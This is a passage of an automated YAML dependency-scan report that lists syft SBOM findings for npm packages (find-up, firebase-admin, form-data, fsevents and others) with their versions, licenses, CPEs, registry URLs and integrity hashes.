integrity: sha512-aA4RyPcd3badbdABGDuTXCMTtOneUCAYH/gxoYRTZlIJdF0YPWuGqiAsIrhNnnqdXGswYk6dGujem4w80UJFhg==
|
|
dependencies:
|
|
debug: 2.6.9
|
|
encodeurl: ~2.0.0
|
|
escape-html: ~1.0.3
|
|
on-finished: ~2.4.1
|
|
parseurl: ~1.3.3
|
|
statuses: ~2.0.2
|
|
unpipe: ~1.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: a37c455231ce6925
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: find-up 4.1.0'
|
|
title: find-up 4.1.0
|
|
description: 'Package discovered: find-up 4.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: dde504db4cea8c91
|
|
name: find-up
|
|
version: 4.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:find-up:find-up:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:find-up:find_up:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:find_up:find-up:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:find_up:find_up:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:find:find-up:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:find:find_up:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/find-up@4.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz
|
|
integrity: sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==
|
|
dependencies:
|
|
locate-path: ^5.0.0
|
|
path-exists: ^4.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 6285de3b3f3c2477
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: firebase-admin 12.7.0'
|
|
title: firebase-admin 12.7.0
|
|
description: 'Package discovered: firebase-admin 12.7.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 01aea657af389bb4
|
|
name: firebase-admin
|
|
version: 12.7.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:firebase-admin:firebase-admin:12.7.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:firebase-admin:firebase_admin:12.7.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:firebase_admin:firebase-admin:12.7.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:firebase_admin:firebase_admin:12.7.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:firebase:firebase-admin:12.7.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:firebase:firebase_admin:12.7.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/firebase-admin@12.7.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/firebase-admin/-/firebase-admin-12.7.0.tgz
|
|
integrity: sha512-raFIrOyTqREbyXsNkSHyciQLfv8AUZazehPaQS1lZBSCDYW74FYXU0nQZa3qHI4K+hawohlDbywZ4+qce9YNxA==
|
|
dependencies:
|
|
'@fastify/busboy': ^3.0.0
|
|
'@firebase/database-compat': 1.0.8
|
|
'@firebase/database-types': 1.0.5
|
|
'@types/node': ^22.0.1
|
|
farmhash-modern: ^1.1.0
|
|
jsonwebtoken: ^9.0.0
|
|
jwks-rsa: ^3.1.0
|
|
node-forge: ^1.3.1
|
|
uuid: ^10.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: a972164b3d990123
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: follow-redirects 1.16.0'
|
|
title: follow-redirects 1.16.0
|
|
description: 'Package discovered: follow-redirects 1.16.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: a8847fd98501e6bd
|
|
name: follow-redirects
|
|
version: 1.16.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:follow-redirects:follow_redirects:1.16.0:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/follow-redirects@1.16.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.16.0.tgz
|
|
integrity: sha512-y5rN/uOsadFT/JfYwhxRS5R7Qce+g3zG97+JrtFZlC9klX/W5hD7iiLzScI4nZqUS7DNUdhPgw4xI8W2LuXlUw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: a2e20f1dd4ff167a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: fontkit 2.0.4'
|
|
title: fontkit 2.0.4
|
|
description: 'Package discovered: fontkit 2.0.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 83c2ace663a40ea8
|
|
name: fontkit
|
|
version: 2.0.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:fontkit:fontkit:2.0.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/fontkit@2.0.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/fontkit/-/fontkit-2.0.4.tgz
|
|
integrity: sha512-syetQadaUEDNdxdugga9CpEYVaQIxOwk7GlwZWWZ19//qW4zE5bknOKeMBDYAASwnpaSHKJITRLMF9m1fp3s6g==
|
|
dependencies:
|
|
'@swc/helpers': ^0.5.12
|
|
brotli: ^1.3.2
|
|
clone: ^2.1.2
|
|
dfa: ^1.2.0
|
|
fast-deep-equal: ^3.1.3
|
|
restructure: ^3.0.0
|
|
tiny-inflate: ^1.0.3
|
|
unicode-properties: ^1.4.0
|
|
unicode-trie: ^2.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 0277ddadc8ca9fad
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: foreground-child 3.3.1'
|
|
title: foreground-child 3.3.1
|
|
description: 'Package discovered: foreground-child 3.3.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: be5a9ebbd8259fbe
|
|
name: foreground-child
|
|
version: 3.3.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:foreground-child:foreground-child:3.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:foreground-child:foreground_child:3.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:foreground_child:foreground-child:3.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:foreground_child:foreground_child:3.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:foreground:foreground-child:3.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:foreground:foreground_child:3.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/foreground-child@3.3.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/foreground-child/-/foreground-child-3.3.1.tgz
|
|
integrity: sha512-gIXjKqtFuWEgzFRJA9WCQeSJLZDjgJUOMCMzxtvFq/37KojM1BFGufqsCy0r4qSQmYLsZYMeyRqzIWOMup03sw==
|
|
dependencies:
|
|
cross-spawn: ^7.0.6
|
|
signal-exit: ^4.0.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f31639275e9af4b4
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: form-data 2.5.5'
|
|
title: form-data 2.5.5
|
|
description: 'Package discovered: form-data 2.5.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: cccf1222c38fa883
|
|
name: form-data
|
|
version: 2.5.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:form-data:form-data:2.5.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:form-data:form_data:2.5.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:form_data:form-data:2.5.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:form_data:form_data:2.5.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:form:form-data:2.5.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:form:form_data:2.5.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/form-data@2.5.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/form-data/-/form-data-2.5.5.tgz
|
|
integrity: sha512-jqdObeR2rxZZbPSGL+3VckHMYtu+f9//KXBsVny6JSX/pa38Fy+bGjuG8eW/H6USNQWhLi8Num++cU2yOCNz4A==
|
|
dependencies:
|
|
asynckit: ^0.4.0
|
|
combined-stream: ^1.0.8
|
|
es-set-tostringtag: ^2.1.0
|
|
hasown: ^2.0.2
|
|
mime-types: ^2.1.35
|
|
safe-buffer: ^5.2.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f04370c9bd4302d0
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: form-data 4.0.5'
|
|
title: form-data 4.0.5
|
|
description: 'Package discovered: form-data 4.0.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: fb8802f2379acb63
|
|
name: form-data
|
|
version: 4.0.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:form-data:form-data:4.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:form-data:form_data:4.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:form_data:form-data:4.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:form_data:form_data:4.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:form:form-data:4.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:form:form_data:4.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/form-data@4.0.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/form-data/-/form-data-4.0.5.tgz
|
|
integrity: sha512-8RipRLol37bNs2bhoV67fiTEvdTrbMUYcFTiy3+wuuOnUog2QBHCZWXDRijWQfAkhBj2Uf5UnVaiWwA5vdd82w==
|
|
dependencies:
|
|
asynckit: ^0.4.0
|
|
combined-stream: ^1.0.8
|
|
es-set-tostringtag: ^2.1.0
|
|
hasown: ^2.0.2
|
|
mime-types: ^2.1.12
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 309869a00f00319d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: forwarded 0.2.0'
|
|
title: forwarded 0.2.0
|
|
description: 'Package discovered: forwarded 0.2.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: e972502f7a8ea944
|
|
name: forwarded
|
|
version: 0.2.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:forwarded_project:forwarded:0.2.0:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/forwarded@0.2.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/forwarded/-/forwarded-0.2.0.tgz
|
|
integrity: sha512-buRG0fpBtRHSTCOASe6hD258tEubFoRLb4ZNA6NxMVHNw2gOcwHo9wyablzMzOA5z9xA9L1KNjk/Nt6MT9aYow==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f433c70fa1fc6314
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: fraction.js 5.3.4'
|
|
title: fraction.js 5.3.4
|
|
description: 'Package discovered: fraction.js 5.3.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: f45608cb782e3ae1
|
|
name: fraction.js
|
|
version: 5.3.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:fraction.js:fraction.js:5.3.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/fraction.js@5.3.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/fraction.js/-/fraction.js-5.3.4.tgz
|
|
integrity: sha512-1X1NTtiJphryn/uLQz3whtY6jK3fTqoE3ohKs0tT+Ujr1W59oopxmoEh7Lu5p6vBaPbgoM0bzveAW4Qi5RyWDQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 9a535c2456d85e31
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: fresh 0.5.2'
|
|
title: fresh 0.5.2
|
|
description: 'Package discovered: fresh 0.5.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 7908a3419570e85d
|
|
name: fresh
|
|
version: 0.5.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:fresh_project:fresh:0.5.2:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/fresh@0.5.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/fresh/-/fresh-0.5.2.tgz
|
|
integrity: sha512-zJ2mQYM18rEFOudeV4GShTGIQ7RbzA7ozbU9I/XBpm7kqgMywgmylMwXHxZJmkVoYkna9d2pVXVXPdYTP9ej8Q==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 2b4f03d780920bbf
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: fsevents 2.3.3'
|
|
title: fsevents 2.3.3
|
|
description: 'Package discovered: fsevents 2.3.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 585a401b2834ec08
|
|
name: fsevents
|
|
version: 2.3.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:fsevents:fsevents:2.3.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/fsevents@2.3.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz
|
|
integrity: sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ed6c41b4eae5b77e
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: function-bind 1.1.2'
|
|
title: function-bind 1.1.2
|
|
description: 'Package discovered: function-bind 1.1.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: a9db1e71931f56ac
|
|
name: function-bind
|
|
version: 1.1.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:function-bind:function-bind:1.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:function-bind:function_bind:1.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:function_bind:function-bind:1.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:function_bind:function_bind:1.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:function:function-bind:1.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:function:function_bind:1.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/function-bind@1.1.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
